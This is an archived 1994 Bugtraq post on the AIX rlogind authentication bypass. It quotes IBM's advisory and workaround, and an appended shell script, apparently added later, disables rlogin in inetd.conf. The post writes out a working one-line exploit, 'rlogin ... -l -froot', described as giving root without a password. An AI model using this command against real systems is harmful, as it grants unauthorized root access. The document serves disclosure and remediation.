Bugtraq mailing list archives
Re: -froot??? (AIX rlogin bug)
From: mgscheue () vela acs oakland edu (Mark G. Scheuern)
Date: Sat, 30 Jul 1994 07:52:22 -0400
Someone over on the firewalls mailing list just threw out this tidbit:

rlogin aix.machine -l -froot

For instance:

rlogin foobar -l -froot

This gives you root access on any AIX 3.2.X machine. Does anyone have any history on this trapdoor? Apparently it also existed in Linux several generations ago.

Ericw
This popped up some weeks ago. This rlogind bug has been around for a long time; it's also in AIX 3.1.X. Here's IBM's statement:

-----------------------------------------------------------------

{URGENT - AIX SECURITY EXPOSURE}

May 20, 1994

IBM has just become aware of an AIX security exposure that makes it possible to remote login to any AIX Version 3 system as the root user without a password. As described below, a workaround is immediately available which eliminates the security exposure by disabling remote login. An emergency fix is also available immediately to rectify the AIX problem so that remote login can be enabled with no security exposure. An APAR has been opened and an official PTF will be made available, in approximately two weeks, for installed AIX systems and included in all new AIX shipments. IBM hopes its efforts to respond rapidly to this problem will allow customers to eliminate this security exposure with minimal disruption.

{IMMEDIATE WORKAROUND:}

The recommended workaround is to disable rlogin in the /etc/inetd.conf file using the following procedure:

1. As root, edit /etc/inetd.conf
2. Comment out the line 'login ... rlogin'
3. Run 'inetimp'
4. Run 'refresh -s inetd'

{EMERGENCY FIX:}

Emergency Fixes for the different levels of AIX affected by this exposure will be available via anonymous ftp from software.watson.ibm.com. The files will be located in /pub/rlogin in compressed tar format.

{OFFICIAL FIX:}

The official fix for this problem can be ordered as Authorized Program Analysis Report (APAR) IX44254. To order an APAR from IBM in the U.S. call 1-800-237-5511 and ask for shipment as soon as it is available. APARs may be obtained outside the U.S. by contacting your local IBM representative.

For questions regarding this information, please contact Frank Karner (KARNER at AUSTIN; TL/793-5950; 512-823-5950).
-----------------------------------------------------------------

When I told one of our on-site IBM droids about this, he didn't believe it. "No way, the government buys these machines because they're Class B secure!" So I showed him...

I also saw an IBM spokesperson describe this in a trade publication as requiring "a complex series of commands". Hell, it's easier than logging in the usual way, with the password.

Mark Scheuern
Chrysler Corp.
"I don't speak for Chrysler"
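Steps 1 and 2 of the workaround in the advisory above can be checked and applied mechanically. The sketch below is an added example, not part of the original post or of IBM's advisory. The function names are hypothetical, and the sample inetd.conf with its server paths is constructed for illustration. It only reports and rewrites a copy of the file; 'inetimp' and 'refresh -s inetd' still have to be run as the advisory describes.

```shell
#!/bin/sh
# Added example: audit an inetd.conf for an active rlogin ("login") entry
# and produce a copy with that entry commented out.

# Print active (uncommented) entries whose service name is "login".
active_login_lines() {
    awk '!/^[ \t]*#/ && $1 == "login"' "$1"
}

# Return 0 if rlogin is still enabled in the given inetd.conf.
rlogin_enabled() {
    [ -n "$(active_login_lines "$1")" ]
}

# Write a copy of $1 to $2 with every active login entry commented out.
# Other services and existing comments pass through unchanged.
comment_out_login() {
    awk '!/^[ \t]*#/ && $1 == "login" { print "#" $0; next } { print }' "$1" > "$2"
}

# Constructed sample file (hypothetical paths, not taken from a real system).
make_sample() {
    cat > "$1" <<'EOF'
## service socket protocol wait user server args
ftp     stream  tcp  nowait  root  /etc/ftpd     ftpd
login   stream  tcp  nowait  root  /etc/rlogind  rlogind
#shell  stream  tcp  nowait  root  /etc/rshd     rshd
EOF
}

demo() {
    tmp=$(mktemp -d) || return 1
    make_sample "$tmp/inetd.conf"
    rlogin_enabled "$tmp/inetd.conf" && echo "before: rlogin ENABLED"
    comment_out_login "$tmp/inetd.conf" "$tmp/inetd.conf.new"
    rlogin_enabled "$tmp/inetd.conf.new" || echo "after: rlogin disabled"
    # Show exactly which line changed; diff exits 1 when files differ.
    diff "$tmp/inetd.conf" "$tmp/inetd.conf.new" || true
    rm -rf "$tmp"
}

demo
```

Writing to a copy and reviewing the diff before replacing the live file keeps the change limited to the login entry.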